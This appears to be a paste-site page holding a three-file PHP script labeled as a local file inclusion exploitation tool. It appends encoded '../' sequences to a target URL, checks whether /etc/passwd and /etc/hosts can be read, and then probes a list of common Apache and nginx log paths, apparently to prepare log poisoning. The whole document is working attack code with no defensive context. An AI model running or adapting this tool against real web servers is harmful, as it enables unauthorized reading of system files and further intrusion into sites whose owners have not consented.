SHOW:
|
|
- or go back to the newest paste.
| 1 | //Lfi.php - Main file | |
| 2 | ||
| 3 | <?php | |
| 4 | ||
| 5 | //LFI exploitation script | |
| 6 | ||
| 7 | require("funcs.php");
| |
| 8 | require("dirs.php");
| |
| 9 | $url = $_GET['u']; | |
| 10 | ||
| 11 | define(LIM, 10); //Limit of ../ to check | |
| 12 | define(RET, "..%2F"); | |
| 13 | ||
| 14 | $toInject = $url; | |
| 15 | ||
| 16 | ||
| 17 | ||
| 18 | //Main loop to append ../ | |
| 19 | for($c = 1; $c < LIM; $c++){
| |
| 20 | $toInject = $toInject.RET; //Url with ../ appended | |
| 21 | ||
| 22 | $passwdTest = searchPasswd($toInject); //Buscamos passwd | |
| 23 | $hostsTest = searchHosts($toInject); //Buscamos etc/hosts | |
| 24 | ||
| 25 | if($passwdTest || $hostsTest){
| |
| 26 | echo $passwdTest." ".$hostsTest; | |
| 27 | testLogs($toInject, $logsDir); | |
| 28 | die; | |
| 29 | } | |
| 30 | ||
| 31 | } | |
| 32 | ||
| 33 | ?> | |
| 34 | ||
| 35 | //funs.php - Functions file | |
| 36 | ||
| 37 | <?php | |
| 38 | ||
| 39 | //This functions returns body of $url | |
| 40 | function getBody($url){
| |
| 41 | $ch = curl_init(); | |
| 42 | curl_setopt($ch, CURLOPT_URL, $url); | |
| 43 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| 44 | curl_setopt($ch, CURLOPT_VERBOSE, 1); | |
| 45 | curl_setopt($ch, CURLOPT_HEADER, 1); | |
| 46 | curl_setopt($ch, CURLOPT_USERAGENT, $ua); | |
| 47 | curl_setopt($ch, CURLOPT_FAILONERROR, True); | |
| 48 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True); | |
| 49 | curl_setopt($ch, CURLOPT_AUTOREFERER, True); | |
| 50 | curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
| 51 | curl_setopt($ch, CURLOPT_ENCODING, ''); | |
| 52 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 53 | ||
| 54 | $body = curl_exec($ch); | |
| 55 | ||
| 56 | return $body; | |
| 57 | } | |
| 58 | ||
| 59 | //This functions returns response size | |
| 60 | function getResponseSize($url){
| |
| 61 | $ch = curl_init(); | |
| 62 | curl_setopt($ch, CURLOPT_URL, $url); | |
| 63 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| 64 | curl_setopt($ch, CURLOPT_VERBOSE, 1); | |
| 65 | curl_setopt($ch, CURLOPT_HEADER, 1); | |
| 66 | curl_setopt($ch, CURLOPT_USERAGENT, $ua); | |
| 67 | curl_setopt($ch, CURLOPT_FAILONERROR, True); | |
| 68 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True); | |
| 69 | curl_setopt($ch, CURLOPT_AUTOREFERER, True); | |
| 70 | curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
| 71 | curl_setopt($ch, CURLOPT_ENCODING, ''); | |
| 72 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 73 | ||
| 74 | curl_exec($ch); | |
| 75 | $info = curl_getinfo($ch); | |
| 76 | ||
| 77 | return $info['size_download']; | |
| 78 | } | |
| 79 | ||
| 80 | //This functions checks if /etc/passwd is accessible | |
| 81 | function searchPasswd($url){
| |
| 82 | $passwd = "etc/passwd"; | |
| 83 | $nb = "%00"; | |
| 84 | $toReq = $url.$passwd;//.$nb; | |
| 85 | $root = "root:x:0:0:root:/root:/bin/bash"; | |
| 86 | $body = getBody($toReq); | |
| 87 | //echo $toReq."<br>"; | |
| 88 | ||
| 89 | if(strpos($body, $root)) return $toReq;//echo $toReq."<br>"; | |
| 90 | ||
| 91 | ||
| 92 | } | |
| 93 | ||
| 94 | //This functions checks if /etc/hosts is accesible | |
| 95 | function searchHosts($url){
| |
| 96 | $hosts = "etc/hosts"; | |
| 97 | $nb = "%00"; | |
| 98 | $toReq = $url.$hosts;//.$nb; | |
| 99 | ||
| 100 | $ip = "127.0.0.1"; | |
| 101 | $host = "localhost"; | |
| 102 | $body = getBody($toReq); | |
| 103 | ||
| 104 | ||
| 105 | if(strpos($body, $ip) && strpos($body, $host)) return $toReq;//echo $toReq."<br>"; | |
| 106 | ||
| 107 | } | |
| 108 | ||
| 109 | function testLogs($url, &$logsDir){
| |
| 110 | echo "<br>"; | |
| 111 | foreach ($logsDir as $dir): | |
| 112 | $currentTest = $url.$dir; //Url with returns with log appended | |
| 113 | echo getResponseSize($currentTest)."<br>"; | |
| 114 | endforeach; | |
| 115 | } | |
| 116 | ?> | |
| 117 | ||
| 118 | //dirs.php - This file contains common Apache directories | |
| 119 | ||
| 120 | <?php | |
| 121 | ||
| 122 | //This file contains an array with common logs directories | |
| 123 | $logsDir = array('error.log',
| |
| 124 | 'error_log', | |
| 125 | 'etc/httpd/conf/logs/error_log', | |
| 126 | 'etc/httpd/logs/error_log', | |
| 127 | 'home/php5/logs/error_log', | |
| 128 | 'log/error.log', | |
| 129 | 'log/error_log', | |
| 130 | 'logs/error.log', | |
| 131 | 'logs/error_log', | |
| 132 | 'usr/local/apache/error.log', | |
| 133 | 'usr/local/apache/log/error_log', | |
| 134 | 'usr/local/apache/logs/error_log', | |
| 135 | 'usr/local/apache2/log/error_log', | |
| 136 | 'usr/local/apache2/logs/access_log', | |
| 137 | 'usr/local/apache2/logs/error.log', | |
| 138 | 'usr/local/apache2/logs/error_log', | |
| 139 | 'usr/local/apachessl/logs/error_log', | |
| 140 | 'usr/local/httpd/log/error_log', | |
| 141 | 'usr/local/httpd/logs/error_log', | |
| 142 | 'usr/local/php/log/error_log', | |
| 143 | 'var/apache2/logs/access_log', | |
| 144 | 'var/apache2/logs/error_log', | |
| 145 | 'var/log/apache/error_log', | |
| 146 | 'var/log/apache2/access.log', | |
| 147 | 'var/log/apache2/access_log', | |
| 148 | 'var/log/apache2/error.log', | |
| 149 | 'var/log/apache2/error_log', | |
| 150 | 'var/log/httpd-access.log', | |
| 151 | 'var/log/httpd-error.log', | |
| 152 | 'var/log/httpd/access_log', | |
| 153 | 'var/log/httpd/error_log', | |
| 154 | 'var/log/nginx/error.log', | |
| 155 | 'var/log/php-fcgi/error_log', | |
| 156 | 'var/log/php-fpm/err.log', | |
| 157 | 'var/www/logs/access_log', | |
| 158 | 'var/www/logs/error_log'); | |
| 159 | ?> |
